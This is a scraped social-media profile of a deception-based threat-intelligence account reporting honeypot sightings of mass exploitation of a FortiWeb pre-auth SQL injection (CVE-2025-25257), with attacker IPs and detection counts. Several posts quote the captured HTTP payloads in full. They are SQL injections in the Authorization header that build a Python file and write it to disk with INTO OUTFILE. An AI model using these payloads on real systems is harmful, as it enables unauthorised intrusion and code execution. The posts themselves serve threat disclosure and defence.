Defused
@DefusedCyber
Followers
897
Following
224
Media
42
Statuses
134
Real-Time Threat Intelligence via Cyber Deception. Start Building for Free: https://t.co/TTnxgi9Hv5
Joined August 2023
Active adversary mass exploiting CVE-2025-25257 (FortiWeb critical pre-auth SQL injection) - attacks originating from Hetzner . VT Detections: 0/94 . 🚨Attacker is currently engaged with our sandbox, further details to be released. Payloads:. Uses CVE-2025-25257 to establish
0
0
3
RT @DefusedCyber: Ransomware vulns with highest exploit likelihood ⬆️ (past 30d):. - CVE-2025-53770 (SharePoint. ) +108108.75%.- CVE-2023-2….
0
61
0
RT @DefusedCyber: Exploitation of CVE-2025-25257 from 193.138.7.140 🇫🇮 (FortiWeb critical pre-auth SQL injection). VT Detections: 1/94. (it….
0
3
0
RT @DefusedCyber: Actor exploiting CVE-2025-25257 (FortiWeb SQL Injection). 104.28.253.229 🇩🇿AS 13335 ( CLOUDFLARENET ). 0/94 detections….
0
4
0
RT @DefusedCyber: Mass exploitation of CVE-2025-25257 from 121.122.33.117 🇲🇾 (FortiWeb critical pre-auth SQL injection) . VT Detections:….
0
2
0
RT @DefusedCyber: Mass exploitation of CVE-2025-25257 from 196.75.238.72 🇲🇦 (FortiWeb critical pre-auth SQL injection) . VT Detections: 0/….
0
93
0
RT @DefusedCyber: Actor exploiting CVE-2025-25257 from 45.11.80.242 🇮🇹(FortiWeb critical pre-auth SQL injection) . VT Detections: 0/94….
0
15
0
Actor exploiting CVE-2025-25257 from 45.11.80.242 🇮🇹(FortiWeb critical pre-auth SQL injection) . VT Detections: 0/94 . Payloads (shortened for brevity):. Under path GET /api/fabric/device/status:. ';create/**/table/**/fabric_user.a/**/(a/**/TEXT);--
0
15
42
More exploit activity from clean IPs:.
Mass exploitation of CVE-2025-25257 from 121.122.33.117 🇲🇾 (FortiWeb critical pre-auth SQL injection) . VT Detections: 0/94 . Multiple Payloads: 🧵 . GET /api/fabric/device/status HTTP/1.1 Host: xxx User-Agent: python-requests/2.32.3 Accept-Encoding: gzip, deflate, br, zstd
0
2
3
Live threat intelligence was collected with our FortiWeb decoy / honeypot template! 🍯. Deploy it yourself 👉
0
0
1
GET /api/fabric/device/status . Authorization: Bearer ';drop/**/table/**/fabric_user.a;--.
1
0
0
GET /api/fabric/device/status . Authorization: Bearer ';use/**/fabric_user;update/**/a/**/set/**/a=(select/**/concat(a,0x2e707927292023)/**/from/**/a);--.
1
0
0
GET /api/fabric/device/status . Authorization: Bearer ';use/**/fabric_user;update/**/a/**/set/**/a=(select/**/concat(a,0x707974686f6e332e31302f70796c6162)/**/from/**/a);--.
1
0
0
GET /api/fabric/device/status . Authorization: Bearer ';select/**/a/**/from/**/fabric_user.a/**/into/**/outfile/**/'/var/log/lib/python3.10/pylab.py'/**/FIELDS/**/ESCAPED/**/BY/**/'.
1
0
0
Mass exploitation of CVE-2025-25257 from 121.122.33.117 🇲🇾 (FortiWeb critical pre-auth SQL injection) . VT Detections: 0/94 . Multiple Payloads: 🧵 . GET /api/fabric/device/status HTTP/1.1 Host: xxx User-Agent: python-requests/2.32.3 Accept-Encoding: gzip, deflate, br, zstd
1
2
15
Actor exploiting CVE-2025-25257 (FortiWeb SQL Injection). 104.28.253.229 🇩🇿AS 13335 ( CLOUDFLARENET ). 0/94 detections on VirusTotal
0
4
7
Exploitation of CVE-2025-25257 from 193.138.7.140 🇫🇮 (FortiWeb critical pre-auth SQL injection). VT Detections: 1/94. (its not us)
Mass exploitation of CVE-2025-25257 from 196.75.238.72 🇲🇦 (FortiWeb critical pre-auth SQL injection) . VT Detections: 0/94 . Payload:.GET /api/fabric/device/status HTTP/1.1 Host: xxxxxx User-Agent: python-requests/2.32.4 Accept-Encoding: gzip, deflate, br, zstd Accept: */*
0
3
12
Mass exploitation of CVE-2025-25257 from 196.75.238.72 🇲🇦 (FortiWeb critical pre-auth SQL injection) . VT Detections: 0/94 . Payload:.GET /api/fabric/device/status HTTP/1.1 Host: xxxxxx User-Agent: python-requests/2.32.4 Accept-Encoding: gzip, deflate, br, zstd Accept: */*
5
93
363